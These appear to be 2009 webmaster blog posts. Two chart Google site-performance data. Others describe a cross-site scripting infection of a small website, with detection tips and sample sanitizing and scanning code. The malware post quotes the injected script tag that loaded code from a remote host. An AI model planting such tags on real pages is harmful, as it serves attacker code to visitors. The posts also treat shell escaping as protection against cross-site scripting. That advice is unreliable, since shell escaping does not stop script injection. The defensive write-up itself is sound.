Wednesday 16 December 2009

Site Performance in a Graph





The faster your site, the more sites are slower than yours...

According to this graph (based on Google's Site Performance data), almost all sites are slower than yours when your site performance is 0.3 seconds.

% slower sites = 105 - 18 * site performance
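For a quick sanity check, the fitted line can be evaluated directly. The coefficients 105 and 18 come from the formula above; capping the result at 100% is my own addition, since the raw line exceeds 100% for very fast sites:

```python
def pct_slower(site_performance_s):
    """Empirical fit from the graph: % of sites slower than yours."""
    return 105 - 18 * site_performance_s

# The raw line can exceed 100%, so cap it for display.
for t in (0.3, 1.0, 1.4):
    print(t, min(pct_slower(t), 100))
```

At 0.3s the fit saturates near 100%, matching the "almost all sites are slower" observation; at 1.0s it gives 87%, close to the 89% read off the graph.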

Update 05-04-2010: I update this graph on a regular basis; normally the changes are minor. Today, however, there seems to be a real change in the graph (1.0s went from 89% slower to 93% slower). The formula above is no longer valid.

Update 12-04-2010: From lifehacker.com I learned that at 1.4s, 87% of the sites are slower (this was originally 81%).

Friday 11 December 2009

Crawlstats versus Site Performance

Google introduced Site Performance. What is the difference between Crawl Stats and Site Performance? The crawl time is between 0.2 and 0.4 seconds, so the site is fast, except at the end of November. Strange. See this image ...



Wednesday 4 November 2009

How to protect your website from malware

What the hell, how is it possible that there was malware on my website?

I have a theory. A nasty computer program infected the website. The way it was done looks like cross-site scripting to me.

OK, why me? Maybe because the nasty computer program searches for webpages called webform*.htm, for example with this search: http://www.google.com/search?hl=en&q=allinurl:+webform.

OK, why was it possible? Because I created my own forms? That should not be a problem (in theory).

I used the PHP strip_tags function, so there should have been no problem (in theory). It was clear that that was not enough (in practice), so I also added the PHP escapeshellcmd function. That nasty little computer program must have abused the forms automatically, because almost all pages were infected at once; it simply could not have been a manual edit.
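A minimal Python sketch of the same two-step idea. The original used PHP's strip_tags and escapeshellcmd; the Python stand-ins below (a tag-stripping regex and shlex.quote) are my own rough equivalents, for illustration only:

```python
import re
import shlex

def strip_tags(text):
    # Remove anything that looks like an HTML tag
    # (rough stand-in for PHP's strip_tags).
    return re.sub(r'<[^>]*>', '', text)

def sanitize_form_field(value):
    # Step 1: drop HTML tags, so injected <script> elements disappear.
    cleaned = strip_tags(value)
    # Step 2: quote the result so shell metacharacters are harmless
    # (rough stand-in for PHP's escapeshellcmd).
    return shlex.quote(cleaned)

print(sanitize_form_field('<script src="http://evil.example/x.js"></script>hello'))
```

As the post notes, filtering alone turned out not to be enough in practice, so treat this as one layer among several, not a complete defence.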

The most important protection against nasty computer programs is probably a Turing test via a CAPTCHA (or reCAPTCHA). I think that this combination gives the most effective protection, although nowadays I am not sure about that. Remember that I thought that strip_tags was enough ;-).

Tip: Test your site with the free Acunetix cross-site scripting scanner

WebHel

How to test if your site contains malware

A few weeks ago, as webmaster of the Helenahoeve (www.helenahoeve.nl), I discovered a problem: the site was hacked. Each page contained some extra code between the closing head tag and the body tag.

The code was something like:
<script src=http://mashaei.ir/AWStats/admin.php></script>

I did not check it, but I think it is some nasty code. I discovered it because I saw in the status bar that the browser was waiting for mashaei.ir. For what? Who is Mashaei? Well, that is a simple question; take a look at http://en.wikipedia.org/wiki/Esfandiar_Rahim_Mashaei but do not visit his site!
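This kind of infection can be caught automatically: scan each page for script tags whose src points at a host you do not recognise. A small Python sketch, where the whitelist and the sample HTML are illustrative assumptions:

```python
import re
from urllib.parse import urlparse

# Hosts you expect to serve scripts on your own pages (assumed example).
ALLOWED_HOSTS = {'www.helenahoeve.nl'}

def find_foreign_scripts(html):
    """Return script src URLs pointing at hosts outside the whitelist."""
    srcs = re.findall(r'<script[^>]+src=["\']?([^"\'> ]+)', html, re.IGNORECASE)
    return [s for s in srcs if urlparse(s).netloc not in ALLOWED_HOSTS]

# Sample page fragment shaped like the injection described above.
page = '</head><script src=http://mashaei.ir/AWStats/admin.php></script><body>'
print(find_foreign_scripts(page))
```

Run over every page of the site, this would have flagged the injected mashaei.ir script the moment it appeared.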

I removed all the rubbish, protected my site a little more, and watched my site more closely. I suggest that you ask Google for advice via http://google.com/safebrowsing/diagnostic?site=mashaei.ir

There are other sites, but they all state that mashaei.ir is okay. I think that is not correct.
  1. McAfee's SiteAdvisor: http://www.siteadvisor.com/sites/mashaei.ir
  2. Finjan Vital Security: http://www.finjan.com/Content.aspx?id=574&surl=mashaei.ir
  3. Norton Safe Web: http://safeweb.norton.com/report/show?url=mashaei.ir&x=0&y=
Luckily, there are other ways to test your site for malware.
  1. If your site contains valid HTML, regularly check http://validator.w3.org/check?uri=www.mashaei.ir
  2. If you know which URLs are valid, check for strange browser requests with http://tools.pingdom.com/?url=www.mashaei.ir
  3. Have your site checked by http://www.dasient.com/
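Because each of these checkers takes the site as a URL parameter, the lookups are easy to script. A small helper that builds the check URLs for a given domain, using the templates from the services mentioned above:

```python
# URL templates taken from the check services mentioned in this post.
CHECKS = {
    'Google Safe Browsing': 'http://google.com/safebrowsing/diagnostic?site={site}',
    'W3C validator': 'http://validator.w3.org/check?uri={site}',
    'Pingdom': 'http://tools.pingdom.com/?url={site}',
}

def check_urls(site):
    """Return a dict of service name -> ready-to-visit check URL."""
    return {name: tpl.format(site=site) for name, tpl in CHECKS.items()}

for name, url in check_urls('www.helenahoeve.nl').items():
    print(name, url)
```

Bookmark the printed URLs (or feed them to a fetcher) to make the check part of a regular routine.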
WebHel